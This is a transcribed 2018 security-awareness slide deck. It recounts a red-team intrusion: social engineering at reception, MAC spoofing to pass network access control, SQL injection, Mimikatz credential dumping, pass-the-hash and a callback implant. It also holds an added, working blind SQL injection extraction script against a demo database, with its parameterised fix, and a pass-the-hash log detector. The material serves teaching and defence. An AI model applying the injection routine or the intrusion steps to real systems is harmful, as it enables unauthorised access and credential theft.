Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
1. Cyber Security 101: Back to the Basics
Shah H. Sheikh – Founder / Sr. Cyber Security Consultant / Advisor
MEng CISSP CISA CISM CRISC CCSK CPSA (CREST UK)
E: shah@dts-solution.com
https://www.linkedin.com/in/shahsheikh/
2. AGENDA
• Introduction to Cyber Security 101
• The Cyber Incidents and Breaches that made the headlines
• Types of Cyber Threats and Threat Actors in the Region
• Facts and Figures – Cyber Security
• Industries impacted by cyber threats and its implication
• Overview on Local Regulation and Industry Standards
• The Cyber Security MYTHS and how we need to go back to the BASICS – 101
• Q&A
3. CYBER SECURITY 101
“By 2020, 100% of large enterprises will be asked to report to
their board of directors on cybersecurity”
Source: Gartner
“It takes 20 years to build a reputation and a few minutes of a
cyber-incident to ruin it.”
Stephane Nappo
4. CYBER SECURITY 101
What is Cyber Security?
• Protection of mission- and business-critical assets through logical security controls
(as distinct from physical security), so that threats cause no adverse impact of any kind to the business.
Why is it important?
• Globalized digital data – every organization holds digital information, many
enterprises trade and carry out business transactions online, and every enterprise is
connected to the internet in one form or another. Cyber security threats can
materialize from both external and internal boundaries, and critical infrastructure needs to be
protected.
5. Today’s Security Situation
• Cybersecurity is getting worse, not better
• Damages expected to double to $6 trillion by 2021 [1]
• New threats easily evade outdated security models
• Investment continues in redundant, ineffective solutions
• Business and consumer confidence is declining
• 66% of businesses have experienced a data breach [2]
• Average annual costs = $9.5M, up 21% [3]
• 64% of US consumers have experienced data theft [4]
Sources: 1. Cybersecurity Ventures Report, 2. Thales Security, 3. 451 Research, 4. Pew Research
“Despite more and more money spent on security each year, our
collective problems continue to worsen” - 451 Research
6. Timeline of Notable Attacks, Massive-Scale Exploits, and Leaks & Tools, 2010–2017
(timeline figure; only the labels are recoverable, the slide grouped them under the columns Attacks, Massive Scale, and Leaks & Tools)
• Stuxnet – targeted the Iranian nuclear program
• Syrian Electronic Army – spear phishing against Middle East nations
• OPM – breached by Chinese hackers
• SWIFT – North Korean banking theft from Bangladesh
• Equifax – Apache Struts vulnerability
• Industroyer – industrial control system attack
• Heartbleed – exploited an SSL/TLS (OpenSSL) vulnerability
• Shellshock – exploited a Linux Bash shell vulnerability
• Linux systemd – DNS server memory attack
• Linux Stack Clash – exploits a Linux stack guard flaw
• Adylkuzz – precursor to WannaCry
• WannaCry – massive-scale SMB ransomware exploit
• Petya & NotPetya – EternalBlue exploit of the SMBv1 flaw
• Bad Rabbit – ransomware variant
• Snowden – leaks of NSA toolkits
• Shadow Brokers – ongoing leaks of NSA toolkits: DoublePulsar, EternalBlue, EternalRock, EternalRomance, DewDrop, Orangutan, Reticulum
Sophisticated Fileless Attacks
• Massive increase in quantity and damage caused
• Fileless techniques bypass conventional security
• Advanced attacks have become mainstream
• High-value, critical infrastructure increasingly at risk
7. Cyber Incident Dwell Time
• 106 days in the Middle East in 2016
• 175 days in the Middle East in 2017
9. Y2018-2021 Predictions
1. Artificial Intelligence (AI) will be weaponized to create mass-scale attacks.
2. Large-scale massive data breaches will continue. IoT ty
3. Crypto-jacking and malware created to perform cryptocurrency mining will significantly rise.
4. File-less attacks will continue to rise and increase in severity, targeting the memory of endpoints / devices.
10. Y2018-2021 Predictions
5. Cyber-physical attacks on national critical infrastructure will prevail and bring down city-wide infrastructure.
6. Key government elections will be hacked, causing civil unrest.
7. Laws and regulations will become stricter, leaving organizations no choice but to take cybersecurity seriously. Board members or C-level executives will stand trial for negligence following a data breach.
12. National Mandate for Cyber Security: NESA / SIA, DESC, ADSSSA
13. Story Time …
We were engaged to perform an internal penetration test exercise against a large
enterprise IT environment – RED TEAMING. Our goal was to demonstrate to the
executive management team that we could physically ‘hack’ into the customer’s IT
environment and “PWN” the infrastructure, simulating what a real threat actor would do.
We were given 5 days to accomplish this task.
14. Phase 1: RECON.&.DISCOVERY
• Phase one was recon and discovery of the target facility (a tower block) and, if time
permitted, an ethical intrusion. The normal visitor flow was:
  • Reception (sign in with Emirates ID)
  • Receptionist calls the client to confirm the meeting
  • Access card issued to pass the security-controlled turnstile
  • Access the relevant floor to meet the client
• Next to the receptionist was a directory of all floors and tenants in the building
• Our target was any one of the following departments:
  • Supply Chain / Procurement
  • Finance
  • HR
15. Phase 2: STAGE.&.LAUNCH
• With the information gathered in the recon phase, it was time to stage and launch the
attack. Our RED TEAM went in to deliver a fake RFP response to the procurement team:
  • The delivery man (our expert pen-tester) had a ‘stammer’ and had left his wallet in the car
  • After much deliberation, the receptionist’s “human empathy” allowed the delivery man to bypass
all checks (exception: filling in the visitor log book), and the security guard opened the turnstiles for him
  • The pen-tester reached the floor where the procurement department was located
16. Phase 2: STAGE.&.LAUNCH
1 Identify a network access port (obtain network access)
• Data VLAN – not possible: NAC was deployed and enforced
• VoIP VLAN – possible, but access was restricted to the VoIP network only
• Disconnected an MFP and got access by SPOOFING its MAC address (printed on the sticker on the back panel), which the NAC accepted
• The printer network was on the same user data network
2 With DHCP we obtained an IP address and the DNS servers
• Scanning and recon activities against the endpoints and servers
• Identified multiple MFPs across the same network
• The MFPs had a default web interface:
  • Status page
  • Admin panel (password protected) – brute-forced in 2 minutes
• The MFP was integrated with a 3rd-party print management suite (PMS)
• We obtained the IP address of the PMS and exploited a vulnerable input on its registration form,
leading to SQLi, to obtain admin credentials
• Once logged into the PMS as admin, we discovered it was integrated with corporate Active Directory
• The web application was poorly developed – the AD LDAP connection string was embedded in the HTML source
• From it we obtained the SERVICE ACCOUNT used by the 3rd-party PMS to bind to AD
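The registration-form SQLi above is the classic case of user input concatenated into SQL. The following is an added example, not code from the talk or from the print management suite in question: a hypothetical “is this username already taken?” check backed by an in-memory SQLite table (constructed data, hypothetical `users` schema and password), shown once as written vulnerably and once with a bound parameter. The `extract_admin_hash` function drives the vulnerable check as a boolean oracle and recovers the admin password hash one hex character at a time, which is how a yes/no form leaks credentials even though it never displays a row.

```python
import hashlib
import sqlite3

# Constructed demo data: a tiny stand-in for the PMS user table (hypothetical).
ADMIN_HASH = hashlib.sha256(b"Pr1ntAdm1n!").hexdigest()   # hypothetical admin password


def build_demo_db():
    """In-memory SQLite database standing in for the PMS back end (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", ADMIN_HASH, "admin"),
         ("jdoe", hashlib.sha256(b"Welcome1").hexdigest(), "user")],
    )
    conn.commit()
    return conn


def username_taken_vulnerable(conn, username):
    """Registration-form check ('is this username taken?') built by string
    formatting: the submitted value becomes part of the SQL text."""
    sql = f"SELECT COUNT(*) FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone()[0] > 0


def username_taken_safe(conn, username):
    """Same check with a bound parameter: the submitted value is data, never SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


def extract_admin_hash(oracle, max_len=80):
    """Boolean-based blind SQL injection through a taken/available oracle.

    `oracle(username)` returns True/False. Each payload asks whether one
    character of the admin row's password_hash equals a guess; the injected
    OR clause makes COUNT(*) non-zero exactly when the guess is right, and the
    trailing -- comments out the query's original closing quote.
    """
    charset = "0123456789abcdef"          # hex digest: 16 candidates per position
    recovered = ""
    for pos in range(1, max_len + 1):
        for guess in charset:
            payload = (f"x' OR (SELECT substr(password_hash, {pos}, 1) FROM users "
                       f"WHERE role = 'admin') = '{guess}'--")
            if oracle(payload):
                recovered += guess
                break
        else:
            break                          # no character matched: end of string
    return recovered


if __name__ == "__main__":
    conn = build_demo_db()
    leaked = extract_admin_hash(lambda u: username_taken_vulnerable(conn, u))
    print("vulnerable form leaked admin hash:", leaked == ADMIN_HASH)
    hardened = extract_admin_hash(lambda u: username_taken_safe(conn, u))
    print("hardened form leaked:", repr(hardened))
```

Against the vulnerable check the full 64-character hash comes back after roughly a thousand requests; against the parameterised check the same payloads are simply a username nobody has registered, so nothing is recovered. The fix is the bound parameter, not input filtering, and the same rule applies to the LDAP string found in the HTML: credentials and connection strings belong in server-side configuration, never in anything rendered to the browser.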
17. Phase 3: EXPLOIT.&.INSTALL
3 We were now able to make LDAP queries against AD
• Enumerated all domain users and domain computers
• Identified all privileges granted to the SERVICE ACCOUNT of the 3rd-party PMS
• One of them was remote access (RDP) to a server
4 We continued with RDP to that server using the compromised SERVICE ACCOUNT (still NO DOMAIN ADMIN yet)
• Once logged in, we ran MIMIKATZ from POWERSHELL to DUMP credentials from memory and recovered a sysadmin password
• Created a domain-admin privileged user
• Extracted the SAM and SYSTEM hives to obtain the local admin password HASH
• Performed a PASS-THE-HASH attack against all servers, including the Domain Controller
• Performed the same attack against endpoints / devices and obtained all of their local password hashes, even though the endpoints had these controls in place:
  • Anti-virus / anti-malware protection
  • No administrative privileges
  • No removable media
• We installed a ‘dummy’ fake process on one machine to make an encrypted call-back to our cloud (the “HOOK”)
18. Phase 4: PERSIST
5 Once the call-back succeeded, the compromised machine was “hooked” and under our control; we could
send it remote instructions and continue the penetration test offsite. Persistence and lateral
movement now prevailed. All of this took one day….
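The pass-the-hash sweep across servers and endpoints in Phases 3 and 4 leaves a recognisable trace in Windows Security event 4624: network logons (LogonType 3) authenticated with NTLM where the account is local to the target machine, from one source, to many hosts in a short time. The block below is an added example written for this page, not detection content from the talk. It runs a simple spray detector over constructed sample events whose field names (time, host, user, domain, type, pkg, src) are abbreviations of 4624's TimeCreated, Computer, TargetUserName, TargetDomainName, LogonType, AuthenticationPackageName and IpAddress; the host names, addresses and thresholds are hypothetical.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified 4624 (successful logon) events, one per line.
# These are made up for the example and are not logs from the engagement.
SAMPLE_LOG = """\
time=2018-03-12T09:00:01 event=4624 host=SRV-FILE01 user=Administrator domain=SRV-FILE01 type=3 pkg=NTLM src=10.10.5.23
time=2018-03-12T09:00:03 event=4624 host=SRV-FILE01 user=jdoe domain=CORP type=3 pkg=Kerberos src=10.10.7.41
time=2018-03-12T09:00:05 event=4624 host=SRV-APP02 user=Administrator domain=SRV-APP02 type=3 pkg=NTLM src=10.10.5.23
time=2018-03-12T09:00:09 event=4624 host=DC01 user=Administrator domain=DC01 type=3 pkg=NTLM src=10.10.5.23
time=2018-03-12T09:00:30 event=4624 host=SRV-PMS01 user=svc_pms domain=CORP type=10 pkg=Negotiate src=10.10.5.23
time=2018-03-12T09:01:00 event=4624 host=SRV-PRINT01 user=Administrator domain=SRV-PRINT01 type=3 pkg=NTLM src=10.10.5.23
time=2018-03-12T09:02:00 event=4624 host=SRV-FILE01 user=backup domain=SRV-FILE01 type=3 pkg=NTLM src=10.10.9.9
time=2018-03-12T09:02:10 event=4624 host=SRV-FILE01 user=backup domain=SRV-FILE01 type=3 pkg=NTLM src=10.10.9.9
"""


def parse_events(text):
    """Parse key=value lines into dicts, converting the timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = dict(kv.split("=", 1) for kv in line.split())
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return events


def is_local_ntlm_network_logon(e):
    """4624, LogonType 3 (network), NTLM, and an account local to the target
    (domain field equals the host name): the shape a SAM-derived hash leaves.
    Kerberos logons and interactive/RDP logons (type 2/10) are ignored."""
    return (e["event"] == "4624" and e["type"] == "3"
            and e["pkg"].upper() == "NTLM"
            and e["domain"].upper() == e["host"].upper())


def find_pass_the_hash_spray(events, min_hosts=3, window=timedelta(minutes=10)):
    """Flag one source IP using one local account name to log on to at least
    `min_hosts` distinct hosts within `window`. Returns a list of alert dicts."""
    groups = defaultdict(list)
    for e in events:
        if is_local_ntlm_network_logon(e):
            groups[(e["src"], e["user"].lower())].append(e)

    alerts = []
    for (src, user), evs in groups.items():
        evs.sort(key=lambda e: e["time"])
        flagged_hosts = set()
        start = 0                                  # sliding window over time
        for i, e in enumerate(evs):
            while evs[start]["time"] < e["time"] - window:
                start += 1
            hosts = {x["host"] for x in evs[start:i + 1]}
            if len(hosts) >= min_hosts:
                flagged_hosts |= hosts
        if flagged_hosts:
            alerts.append({"src": src, "user": user, "hosts": sorted(flagged_hosts)})
    return alerts


if __name__ == "__main__":
    for alert in find_pass_the_hash_spray(parse_events(SAMPLE_LOG)):
        print(f"possible pass-the-hash: {alert['user']} from {alert['src']} "
              f"-> {', '.join(alert['hosts'])}")
```

On the sample the detector raises one alert, for the built-in Administrator account from 10.10.5.23 reaching four hosts including DC01, and stays quiet on the Kerberos user logon, the service account's RDP session, and the two-logon `backup` account. Backup and monitoring agents that authenticate with local accounts will match this pattern too, so tune `min_hosts` and the window per environment and whitelist known sources rather than dropping the rule.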
The cyber kill chain (figure): RECON → STAGE → LAUNCH → EXPLOIT → INSTALL → CALLBACK → PERSIST
(target → COMPROMISE → BREACH; File Trajectory)
“Give me six hours to chop down a tree and I will spend the first four
sharpening the axe.”
Abraham Lincoln
20. Cyber Security Myths….
• If I have an anti-virus solution I am protected…
• Small and medium enterprises / businesses are not real targets…
• Only certain industries are prone to cyber-attacks…
• I have never been breached before…
• A strong password is sufficient to protect me…
• Cyber threats originate from the outside…
• Cyber security is the responsibility of IT…
• You will know right away if your endpoint device is infected…
• Complete cyber security can be achieved…